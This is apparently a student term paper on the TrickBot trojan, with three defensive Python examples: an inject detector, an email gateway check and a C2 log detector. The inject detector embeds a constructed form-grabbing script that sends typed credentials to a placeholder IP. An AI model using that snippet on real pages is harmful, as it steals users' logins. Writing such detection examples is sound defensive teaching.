CS 462 Term Project

Cybersecurity in the Real World


The world has entered a technologically advanced age in which many countries and people are almost completely reliant on their devices. Examples include the invention and rapid development of artificial intelligence, the public's exposure to media such as TikTok, X, Instagram, and Snapchat, companies moving their records from paper to digital systems, and even simple access to the internet. Because of this, cybersecurity is more important than ever, especially since everyone wants their information to remain private.
Of course, even with cybersecurity there is always a risk of breaches or exposures. These risks include anything that can affect the confidentiality, integrity, or availability of your data, such as malware, social engineering, denial-of-service attacks, ransomware, phishing, and zero-day exploits. While some of these categories are narrow, most of them cover many important and dangerous threats.
Malware, for example, includes viruses, worms, trojans, adware, and spyware, all of which are typically used to gain access to a system and steal, encrypt, or damage data. The specific malware discussed here is a trojan that was originally created to steal financial information. It eventually turned into a "highly modular, multistage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activity," according to the Cybersecurity & Infrastructure Security Agency (CISA 2021). This trojan is called TrickBot, and it was first discovered in 2016.
Like other trojans, TrickBot needs a person to let it in: it reaches a network through spear-phishing, typically an email whose attachment or link delivers the malware when the recipient opens it. Once inside, it spreads through the system and the network, and along the way it can steal, encrypt, or even delete data (Baker 2023).


TrickBot Malware


During the years that TrickBot was active it affected millions of people around the world, along with hospitals, schools, and businesses. In the U.S. alone it affected people in 47 of the 50 states, and individuals tied to a Russia-based cybercrime group, commonly tracked as Wizard Spider, have been charged in connection with many of these attacks (Office of Public Affairs 2023). According to Wallarm, the financial losses across the affected countries ran well into the millions, with North America topping the list at over 1 billion dollars lost (Ilyin 2025).
One TrickBot campaign took place in 2020, during one of the peaks of COVID, and hit three hospitals whose computers and devices all went down after they were targeted by Wizard Spider. The goal was to hit hospitals that were already overwhelmed by COVID so that they would pay a ransom to get their systems back, but after the arrests of some Wizard Spider members the attacks died down (Burgess 2022).
Once the trojan is on a system it can watch every website the victim visits. When the victim opens a targeted site, in this case any bank website or site handling financial data, it captures the login credentials the victim types and any account details the page displays. According to Wallarm, "This stolen information can subsequently be auctioned on the darknet or used for future malicious endeavors" (Ilyin 2025). The Total Fraud Protection channel on YouTube has a video showing how TrickBot works: the targeted site still loads over HTTPS with a valid certificate, because the tampering happens inside the infected browser rather than on the network, but the page's code is longer than the original and contains an injected script that copies the credentials entered on the page (2017).
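The comparison the video makes, a longer page in the browser than the one the bank served, can be automated. The block below is an added example written for this write-up, not code from TrickBot, CISA, or any cited vendor: it extracts every script from a served HTML snapshot and from the snapshot the browser rendered, hashes inline scripts, and reports any script that exists only in the rendered copy, together with the credential-grabbing keywords it contains. Both HTML snapshots and the keyword list are constructed assumptions.

```python
"""
Spot a man-in-the-browser web inject by diffing the page the browser rendered
against the page the bank actually served.

Added example for this write-up, not code from TrickBot, CISA, or any cited
vendor. The two HTML snapshots are constructed; the injected script stands in
for the credential-copying code the Total Fraud Protection video describes,
and the SUSPICIOUS keyword list is an assumed heuristic.
"""
import hashlib
import re

# What the server sends (constructed sample of a login page).
SERVED_HTML = """<html><head><title>Example Bank</title>
<script src="/static/app.js"></script>
<script>window.csrf = "abc123";</script>
</head><body>
<form id="login" action="/login" method="post">
<input name="user"><input name="pass" type="password">
</form></body></html>"""

# What the infected browser renders (constructed): the same page plus one
# extra inline script that hooks the form and ships credentials elsewhere.
RENDERED_HTML = SERVED_HTML.replace(
    "</form>",
    """</form>
<script>
document.getElementById("login").addEventListener("submit", function () {
  var u = document.getElementsByName("user")[0].value;
  var p = document.getElementsByName("pass")[0].value;
  new Image().src = "https://198.51.100.23/grab?u=" + u + "&p=" + p;
});
</script>""",
)

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Tokens that rarely appear in a bank's own login script but are typical of
# form-grabbing injects (assumed heuristic; tune per site).
SUSPICIOUS = ("addEventListener", ".value", "new Image", "XMLHttpRequest", "fetch(")


def extract_scripts(html):
    """Return (kind, identity, body) for every <script> in the page.
    External scripts are identified by their src; inline scripts by a
    SHA-256 of their (stripped) body."""
    scripts = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            scripts.append(("external", src.group(1), ""))
        else:
            body = body.strip()
            scripts.append(("inline", hashlib.sha256(body.encode()).hexdigest(), body))
    return scripts


def find_injects(served_html, rendered_html):
    """Scripts present in the rendered DOM but absent from the served page."""
    baseline = {(kind, ident) for kind, ident, _ in extract_scripts(served_html)}
    findings = []
    for kind, ident, body in extract_scripts(rendered_html):
        if (kind, ident) in baseline:
            continue
        hits = [token for token in SUSPICIOUS if token in body]
        findings.append({"kind": kind, "id": ident, "bytes": len(body), "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in find_injects(SERVED_HTML, RENDERED_HTML):
        print("injected %s script (%d bytes), indicators: %s"
              % (finding["kind"], finding["bytes"], ", ".join(finding["indicators"])))
```

The caveat that matters in practice: because TrickBot's inject lives inside the victim's browser, a check that runs in that same browser can be tampered with too. Fraud-protection vendors therefore ship the rendered-page fingerprint to a server they control and do the comparison there, and treat the result as one signal alongside device and behaviour data rather than as proof on its own.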
TrickBot can do more than that. According to CrowdStrike it can install backdoors in the network and on systems so the operators keep their access, disable any antivirus tools that are installed, and adapt itself so that it is hard to trace or even to know that a system is infected. TrickBot also communicates with a command-and-control (C2) server, which lets the operators push tasks to infected machines and turn them into bots spread across the environment. Because it is a modular trojan, each module has its own job. The core module, coreDll, is the main component and handles packing and encrypting data. injectDll watches the victim's activity on financial websites and steals the information entered there. tabDll uses the EternalRomance exploit to spread the malware further across the network (CIS Blog 2021). Since TrickBot can get rid of a lot of antivirus software, it is known in particular for disabling Windows Defender. On top of that it can download and install other malware onto the device and let it attack the system or demand a ransom, such as the Ryuk and Conti ransomware families associated with Wizard Spider (Baker 2023).


Defense and Mitigation


Because TrickBot became so adaptive it is very difficult to tell that a network is infected. The best way to protect your devices is to limit access to the network so there is less chance of it being affected. Requiring multi-factor authentication helps ensure that only the right people get access. Training the associates at your company is also a good way to keep systems from being infected, because they will then recognize when a site or attachment looks suspicious, and if a machine does get infected they will know what to look for and report it quickly. To blunt social engineering attempts inside a company, you can mark emails from outside the organization as external so that associates are extra cautious with them. If systems are infected, isolating them from the rest of the network helps keep the malware from spreading (Baker 2023). According to Wallarm, companies such as Symantec, McAfee, and Kaspersky have antivirus software that can find and remove TrickBot, and organizations around the world have started reducing the vulnerabilities in their systems to keep TrickBot from breaching them (Ilyin 2025).
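Marking outside mail as external is usually done at the mail gateway, and the same hook is a natural place to flag the attachment types and "enable editing" lures that TrickBot phishing relied on. The block below is an added example for this write-up, not code from CrowdStrike, Wallarm, or any mail product: it parses a raw message with Python's standard `email` library, prefixes the subject with `[EXTERNAL]` when the sender's domain is not in the organization's list, lists attachments with risky extensions, and looks for macro-lure phrases in the body. The internal-domain list, the extension list, the lure phrases, and the sample message are all assumptions constructed for the example.

```python
"""
Gateway-style checks for inbound mail: tag messages from outside the
organization as external and flag the attachment types and lure phrases
that macro-dropper phishing relies on.

Added example for this write-up, not code from any cited source. The
internal-domain list, the risky-extension list, the lure phrases and the
sample message are all assumptions constructed for illustration.
"""
import email
import email.utils
from email import policy

INTERNAL_DOMAINS = {"example.com", "corp.example.com"}     # assumed

# Extensions commonly abused to deliver macro droppers and loaders (assumed).
RISKY_EXT = {".docm", ".xlsm", ".doc", ".xls", ".js", ".vbs", ".lnk", ".iso", ".zip"}

# Phrases that nudge the recipient into enabling macros (assumed list).
LURE_PHRASES = ("enable editing", "enable content", "enable macros")

# Constructed sample of a TrickBot-style invoice lure with a macro-enabled doc.
SAMPLE = """\
From: "Accounts Payable" <ap@example-invoices.net>
To: alice@example.com
Subject: Overdue invoice 4471
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review the attached invoice and enable editing to view.
--b1
Content-Type: application/vnd.ms-word.document.macroEnabled.12; name="invoice.docm"
Content-Disposition: attachment; filename="invoice.docm"
Content-Transfer-Encoding: base64

UEsDBBQABgAIAAAAIQA=
--b1--
"""


def sender_domain(msg):
    """Domain of the RFC 5322 From address, lower-cased ('' if unparsable)."""
    addr = email.utils.parseaddr(msg.get("From", ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def risky_attachments(msg):
    """File names of attachments whose extension is on the risky list."""
    names = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        if ext in RISKY_EXT:
            names.append(name)
    return names


def assess(raw):
    """Parse one raw message and return the gateway's verdict as a dict."""
    msg = email.message_from_string(raw, policy=policy.default)
    external = sender_domain(msg) not in INTERNAL_DOMAINS
    risky = risky_attachments(msg)
    subject = msg.get("Subject", "")
    if external and not subject.startswith("[EXTERNAL] "):
        subject = "[EXTERNAL] " + subject
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    lure = any(phrase in text.lower() for phrase in LURE_PHRASES)
    return {
        "external": external,
        "subject": subject,
        "risky_attachments": risky,
        "macro_lure": lure,
        # External sender plus a risky attachment or a macro lure: hold it.
        "quarantine": external and (bool(risky) or lure),
    }


if __name__ == "__main__":
    print(assess(SAMPLE))
```

The From-domain check only decides what to label; an external sender spoofing an internal domain is caught by SPF/DKIM/DMARC at the gateway, not by this function, so the two controls belong together.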
CISA's advisory publishes intrusion-detection signatures for TrickBot network activity, which makes sense given what the Total Fraud Protection video shows: the injected code in a tampered page states what it is for and is noticeably different from the original site, so it can be matched (CISA 2021; Total Fraud Protection 2017). The video also mentions that client lists should help determine whether any malicious code has been injected into the sites you visit (Total Fraud Protection 2017).
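As an added example of the kind of network check a signature describes, the block below runs heuristic TrickBot C2 indicators over constructed web-proxy log lines. It is written for this write-up and is not CISA's published rule set, which should be deployed as written in the advisory; the indicators it uses (HTTP requests to ports 447 or 449, and a URI shaped like `/<group tag>/<hostname>_W<build>.<hex id>/<command>/`) are assumptions modelled on public reporting about TrickBot, and the log lines are constructed.

```python
"""
Heuristic detection of TrickBot-style command-and-control traffic over
constructed proxy log lines.

Added example for this write-up. The log lines are constructed, and the
indicators (ports 447/449, the group-tag/client-id URI shape) are assumptions
modelled on public reporting about TrickBot; they are not CISA's published
signatures.
"""
import re
from collections import Counter

# Constructed log format: <timestamp> <src ip> <dst ip>:<dst port> <method> <uri>
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>[^:\s]+):(?P<port>\d+) (?P<method>[A-Z]+) (?P<uri>\S+)$"
)

# Non-standard ports reported for TrickBot C2 besides 443 (assumed list).
C2_PORTS = {447, 449}

# Assumed URI shape: /<group tag>/<hostname>_W<windows build>.<hex id>/<command number>/...
URI_RE = re.compile(
    r"^/[A-Za-z]{2,5}\d{2,4}/[A-Za-z0-9-]+_W\d{5,9}\.[0-9A-Fa-f]{8,}/\d+/"
)

# Constructed sample: one infected host beaconing, two benign hosts.
SAMPLE_LOG = """\
2021-03-17T10:00:01Z 10.0.0.5 203.0.113.9:447 GET /ser0921/DESKTOP-7HK2Q1_W10019041.AB12CD34EF56AB12/14/user/
2021-03-17T10:00:03Z 10.0.0.5 203.0.113.9:447 POST /ser0921/DESKTOP-7HK2Q1_W10019041.AB12CD34EF56AB12/63/
2021-03-17T10:00:07Z 10.0.0.8 93.184.216.34:443 GET /index.html
2021-03-17T10:00:09Z 10.0.0.5 198.51.100.4:449 GET /ser0921/DESKTOP-7HK2Q1_W10019041.AB12CD34EF56AB12/5/file/
2021-03-17T10:00:11Z 10.0.0.9 203.0.113.77:447 GET /healthz
"""


def parse(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec


def score(rec):
    """Names of the indicators that fire for one parsed record."""
    reasons = []
    if rec["port"] in C2_PORTS:
        reasons.append("http-on-port-%d" % rec["port"])
    if URI_RE.match(rec["uri"]):
        reasons.append("trickbot-uri-shape")
    return reasons


def detect(lines):
    """Return (alerts, beacons): one alert per line that fires any indicator,
    and a count of repeated (src, dst, port) contacts among the alerts, which
    surfaces the periodic check-in pattern of a bot talking to its C2."""
    alerts = []
    beacons = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        reasons = score(rec)
        if reasons:
            alerts.append({"src": rec["src"], "dst": rec["dst"], "port": rec["port"],
                           "uri": rec["uri"], "reasons": reasons})
            beacons[(rec["src"], rec["dst"], rec["port"])] += 1
    return alerts, beacons


if __name__ == "__main__":
    found, counts = detect(SAMPLE_LOG.splitlines())
    for alert in found:
        print("%s -> %s:%d %s  [%s]" % (alert["src"], alert["dst"], alert["port"],
                                        alert["uri"], ", ".join(alert["reasons"])))
    for key, n in counts.most_common():
        print("%s -> %s:%d contacted %d times" % (key + (n,)))
```

A port-only hit (the `/healthz` request above) is weak evidence on its own; the URI shape plus the port, repeated from the same source, is what should page someone. Real deployments also pull the TLS certificate fields, which CISA's advisory covers and which this example does not.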
Although TrickBot first appeared in 2016, many of the attacks happened during the COVID years, when the stress on the world made it easier to target vulnerable places like the hospitals mentioned earlier. Now, in 2025, TrickBot is still around and still evolving, becoming better and smarter, so our methods of detecting it need to evolve and get stronger too.
The problem with today's society is that, because so much of the world is shaped by what goes on in the media, I think more people would fall for the social engineering side of TrickBot. A fake email from a company advertising a popular product could lead someone to click a link or open an infected attachment without a second thought. Because of this, I believe it is essential for social media companies to educate their users about these threats to their safety and security so they stay alert. Although there still are not many ways to detect a TrickBot infection, the methods for preventing one have grown as TrickBot's capabilities have changed. So make sure you look out for manipulative or fake emails, infected web browsers, and phishing traps.

References


Baker, Kurt. "What Is TrickBot Malware?" CrowdStrike, 2 Oct. 2023, www.crowdstrike.com/en-us/cybersecurity-101/malware/trickbots/.
"Blog: TrickBot: Not Your Average Hat Trick – a Malware with Multiple Hats." Center for Internet Security, 22 Apr. 2021, www.cisecurity.org/insights/blog/trickbot-not-your-average-hat-trick-a-malware-with-multiple-hats.
Burgess, Matt. "Inside Trickbot, Russia's Notorious Ransomware Gang." Wired, Conde Nast, 1 Feb. 2022, www.wired.com/story/trickbot-malware-group-internal-messages/.
Total Fraud Protection. "How Trickbot Works." YouTube, 19 Sept. 2017, www.youtube.com/watch?v=2MUKoNcGo-8.
Ilyin, Stepan. "Deciphering TrickBot: How It Works and How to Mitigate It." Wallarm, 5 Apr. 2025, www.wallarm.com/what/trickbot-malware.
"Multiple Foreign Nationals Charged in Connection with Trickbot Malware and Conti Ransomware Conspiracies." Office of Public Affairs, United States Department of Justice, 7 Sept. 2023, updated 6 Feb. 2025, www.justice.gov/archives/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware.
"TrickBot Malware." Cybersecurity and Infrastructure Security Agency (CISA), 21 May 2021, www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a.
